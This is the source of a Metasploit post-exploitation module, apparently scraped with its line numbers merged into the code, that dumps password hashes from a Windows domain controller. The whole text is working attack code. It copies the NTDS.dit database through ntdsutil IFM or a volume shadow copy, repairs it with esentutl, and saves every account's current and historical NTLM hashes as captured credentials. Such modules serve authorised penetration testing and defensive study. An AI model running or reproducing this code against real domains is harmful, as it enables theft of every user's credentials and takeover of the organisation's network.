Path: blob/master/modules/post/windows/gather/credentials/domain_hashdump.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/ntds/parser'67class MetasploitModule < Msf::Post8include Msf::Post::Windows::Accounts9include Msf::Post::Windows::Registry10include Msf::Auxiliary::Report11include Msf::Post::Windows::Priv12include Msf::Post::Windows::ShadowCopy13include Msf::Post::File14include Msf::Post::Windows::ExtAPI1516def initialize(info = {})17super(18update_info(19info,20'Name' => 'Windows Domain Controller Hashdump',21'Description' => %q{22This module attempts to copy the NTDS.dit database from a live Domain Controller23and then parse out all of the User Accounts. It saves all of the captured password24hashes, including historical ones.25},26'License' => MSF_LICENSE,27'Author' => ['theLightCosine'],28'Platform' => [ 'win' ],29'SessionTypes' => [ 'meterpreter' ],30'Notes' => {31'Stability' => [CRASH_SAFE],32'SideEffects' => [],33'Reliability' => []34},35'Compat' => {36'Meterpreter' => {37'Commands' => %w[38extapi_ntds_parse39stdapi_fs_stat40]41}42}43)44)45deregister_options('SMBUser', 'SMBPass', 'SMBDomain')46register_options(47[48OptBool.new(49'CLEANUP', [ true, 'Automatically delete ntds backup created', true]50)51]52)53end5455def run56if preconditions_met?57print_status 'Pre-conditions met, attempting to copy NTDS.dit'58ntds_file = copy_database_file59unless ntds_file.nil?60file_stat = client.fs.file.stat(ntds_file)61print_status "NTDS File Size: #{file_stat.size} bytes"62print_status 'Repairing NTDS database after copy...'63print_status repair_ntds(ntds_file)64realm = sysinfo['Domain']65begin66ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)67rescue Rex::Post::Meterpreter::RequestError => e68print_bad("Failed to properly parse database: #{e}")69if e.to_s.include? '1004'70print_bad('Error 1004 is likely a jet database error because the ntds database is not in the regular format')71end72end73unless ntds_parser.nil?74print_status 'Started up NTDS channel. Preparing to stream results...'75ntds_parser.each_account do |ad_account|76print_good ad_account.to_s77report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)78ad_account.nt_history.each_with_index do |nt_hash, index|79hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH80hash_string << ":#{nt_hash}"81report_hash(hash_string.downcase, ad_account.name, realm)82end83end84end85if datastore['cleanup']86print_status "Deleting backup of NTDS.dit at #{ntds_file}"87rm_f(ntds_file)88else89print_bad "#{ntds_file} requires manual cleanup"90end91end92end93end9495def copy_database_file96version = get_version_info97if version.windows_server?98if version.build_number.between?(Msf::WindowsVersion::Server2003_SP0, Msf::WindowsVersion::Server2003_SP2)99print_status 'Using Volume Shadow Copy Method'100return vss_method101elsif version.build_number >= Msf::WindowsVersion::Server2008_SP0102print_status 'Using NTDSUTIL method'103return ntdsutil_method104end105end106print_error 'This version of Windows is unsupported'107return nil108end109110def ntds_exists?111return false unless ntds_location112113file_exist?("#{ntds_location}\\ntds.dit")114end115116def ntds_location117@ntds_location ||= registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\', 'DSA Working Directory')118end119120def ntdsutil_method121tmp_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha(6..13)}"122command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"123result = cmd_exec('ntdsutil.exe', command_arguments, 90)124if result.include? 'IFM media created successfully'125file_path = "#{tmp_path}\\Active Directory\\ntds.dit"126print_status "NTDS database copied to #{file_path}"127else128print_error 'There was an error copying the ntds.dit file!'129vprint_error result130file_path = nil131end132file_path133end134135def preconditions_met?136unless is_admin?137print_error('This module requires Admin privs to run')138return false139end140141print_status('Session has Admin privs')142143unless domain_controller?144print_error('Host does not appear to be an AD Domain Controller')145return false146end147148print_status('Session is on a Domain Controller')149150unless ntds_exists?151print_error('Could not locate ntds.dit file')152return false153end154155unless session.commands.include?(Rex::Post::Meterpreter::Extensions::Extapi::COMMAND_ID_EXTAPI_NTDS_PARSE)156fail_with(Failure::BadConfig, 'Session does not support Meterpreter ExtAPI NTDS parser')157end158159session_compat?160end161162def repair_ntds(path = '')163arguments = "/p /o \"#{path}\""164cmd_exec('esentutl', arguments)165end166167def report_hash(ntlm_hash, username, realm)168cred_details = {169origin_type: :session,170session_id: session_db_id,171post_reference_name: refname,172private_type: :ntlm_hash,173private_data: ntlm_hash,174username: username,175realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,176realm_value: realm,177workspace_id: myworkspace_id178}179create_credential(cred_details)180end181182def session_compat?183if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86184print_error 'You are running 32-bit Meterpreter on a 64 bit system'185print_error 'Try migrating to a 64-bit process and try again'186false187else188true189end190end191192def vss_method193unless start_vss194fail_with(Failure::NoAccess, 'Unable to start VSS service')195end196location = ntds_location.dup197location.slice!(0, 3)198id = create_shadowcopy(volume.to_s)199print_status "Getting Details of ShadowCopy #{id}"200sc_details = get_sc_details(id)201sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit"202target_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha(6..13)}"203print_status "Moving ntds.dit to #{target_path}"204move_file(sc_path, target_path)205target_path206end207end208209210